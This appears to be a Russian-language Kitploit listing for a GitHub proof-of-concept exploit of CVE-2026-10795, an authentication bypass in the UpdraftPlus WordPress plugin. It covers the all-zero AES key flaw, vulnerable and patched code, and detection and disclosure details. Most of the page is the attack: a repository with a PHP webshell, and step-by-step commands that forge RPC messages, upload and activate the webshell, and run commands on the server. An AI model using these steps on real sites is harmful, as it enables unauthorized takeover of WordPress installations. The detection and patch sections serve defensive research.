Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-10795 — CVE-2026-10795 – UpdraftPlus обход аутентификации | Kitploit
Инструменты/GitHubGitHub/izxci/cve-2026-10795
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubizxci/cve-2026-10795

CVE-2026-10795

CVE-2026-10795 – UpdraftPlus обход аутентификации

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-10795

CVE-2026-10795 – Обход аутентификации UpdraftPlus

CVE-2026-10795 – UpdraftPlus Authentication Bypass PoC

⚠️ Дисклеймер: Этот репозиторий предназначен только для образовательных целей.
Используйте это только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.
Автор не несет ответственности за любое неправомерное использование.


📋 Обзор

ПолеДетали
ПлагинUpdraftPlus: WP Backup & Migration
Затронутые версии≤ 1.26.4
Исправленная версия1.26.5
Оценка CVSS8.1 (Высокий)
Тип уязвимостиНеаутентифицированный обход аутентификации → RCE
Обнаруженаvtim (Wordfence Bug Bounty)
Награда$5,200

🔍 Сводка по уязвимости

UpdraftPlus регистрирует неаутентифицированный RPC-слушатель на каждой загрузке страницы для сайтов, подключенных к UpdraftCentral.

Функция decrypt_message() не проверяет возвращаемое значение $rsa->decrypt().
Когда расшифровка RSA терпит неудачу, false передается в Rijndael::setKey(), что приводит к детерминированному нулевому AES-128 ключу.

Атакующий может:

  1. Создать поддельное udrpc_message, зашифрованное нулевым ключом
  2. Заставить сервер успешно его расшифровать
  3. Выполнять произвольные RPC-команды от имени подключенного администратора
  4. Загрузить и активировать вредоносный плагин → Удаленное выполнение кода

🧬 Уязвимый код

root@kitploit:~
// updraftplus/includes/class-remote-communications-v2.php
// Lines 460-491 (version 1.26.4)

$sym_key = $rsa->decrypt($sym_key);
// ❌ No return value check!

$rij->setKey($sym_key);  // false → all-zero key
return $rij->decrypt($ciphertext);

✅ Исправленный код

root@kitploit:~
$sym_key = $rsa->decrypt($sym_key);

// ✅ Added in 1.26.5
if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) < 16) {
    return false;
}

$rij->setKey($sym_key);
return $rij->decrypt($ciphertext);

📁 Структура репозитория

root@kitploit:~
updraftplus-auth-bypass/
├── README.md
├── poc.py                  # Main exploit script
├── requirements.txt        # Python dependencies
├── payloads/
│   ├── list_plugins.py     # List installed plugins
│   ├── upload_shell.py     # Upload webshell plugin
│   └── activate_plugin.py  # Activate uploaded plugin
├── shell/
│   ├── build_shell.py      # Builds webshell ZIP
│   └── test-shell.php      # Minimal PHP webshell
└── docs/
    ├── technical-analysis.md
    └── patch-diff.md

⚙️ Установка

root@kitploit:~
git clone https://github.com/yourname/updraftplus-auth-bypass
cd updraftplus-auth-bypass
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests==2.31.0
pycryptodome==3.20.0

🧪 Настройка тестового окружения

1. Установите XAMPP

root@kitploit:~
https://www.apachefriends.org
Запустите: Apache + MySQL

2. Установите WordPress + UpdraftPlus 1.26.4

root@kitploit:~
# Place WordPress in htdocs
C:/xampp/htdocs/wordpress/

# Install vulnerable plugin version
# Download: https://plugins.trac.wordpress.org/browser/updraftplus/tags/1.26.4

3. Подключитесь к UpdraftCentral

root@kitploit:~
Админ-панель WordPress → Настройки → UpdraftPlus → Вкладка UpdraftCentral → Подключиться

⚠️ Требование: Сайт должен быть подключен к UpdraftCentral, чтобы уязвимость была эксплуатируемой.


🚀 Использование

Базовое использование

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --user-id 1

Список плагинов

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --cmd plugin.get_plugins

Загрузить веб-шелл

root@kitploit:~
# Step 1: Build the shell ZIP
python shell/build_shell.py

# Step 2: Upload
python poc.py --url http://localhost/wordpress/ --cmd upload_shell

# Step 3: Activate
python poc.py --url http://localhost/wordpress/ --cmd activate_shell

# Step 4: Test RCE
curl "http://localhost/wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami"

🔬 Как это работает

root@kitploit:~
poc.py
  │
  ├─ 1. Craft malformed RSA-encrypted sym_key (garbage bytes)
  │
  ├─ 2. Encrypt RPC payload with ZERO AES-128 key (0x00 * 16)
  │
  ├─ 3. Build udrpc_message:
  │       [3-byte hex len][fake_sym_key][16-byte hex cipherlen][ciphertext]
  │
  ├─ 4. POST to target (no auth, no nonce, no cookies needed)
  │
  └─ 5. Server-side:
          rsa->decrypt(garbage) → false
          setKey(false)         → 0x00 key
          decrypt(ciphertext)   → our payload ✅
          wp_set_current_user() → admin access
          RPC command executes  → RCE 💀

🛡️ Обнаружение и смягчение

Устранение

root@kitploit:~
Update UpdraftPlus to version 1.26.5 immediately.

Обнаружение (анализ логов)

root@kitploit:~
# Look for suspicious POST requests with udrpc_message
grep "udrpc_message" /var/log/apache2/access.log

# Wordfence users are protected since June 3, 2026

Индикаторы компрометации

root@kitploit:~
- Неожиданные установки плагинов
- Новые PHP-файлы в wp-content/plugins/
- POST-запросы к корню WordPress с параметром udrpc_message
- Неожиданные действия уровня администратора в логах WordPress

📅 График раскрытия

ДатаСобытие
June 1, 2026Уязвимость отправлена через программу Bug Bounty Wordfence
June 3, 2026Подтверждена и раскрыта вендору
June 3, 2026Развернуто правило брандмауэра Wordfence Premium
June 4, 2026Вендор подтвердил
June 5, 2026Выпущен патч (v1.26.5)
July 3, 2026Защита Wordfence Free активна

📚 Ссылки

  • Wordfence Advisory
  • Страница плагина UpdraftPlus
  • Документация phpseclib RSA
  • Журнал изменений плагина

👤 Благодарности

  • Первооткрыватель: vtim (Программа Wordfence Bug Bounty)
  • Автор PoC: izxci
  • Назначение: Образование / Исследования безопасности

📜 Лицензия

root@kitploit:~
MIT License – For educational use only.
Unauthorized use against systems you don't own is illegal.
Скачать инструмент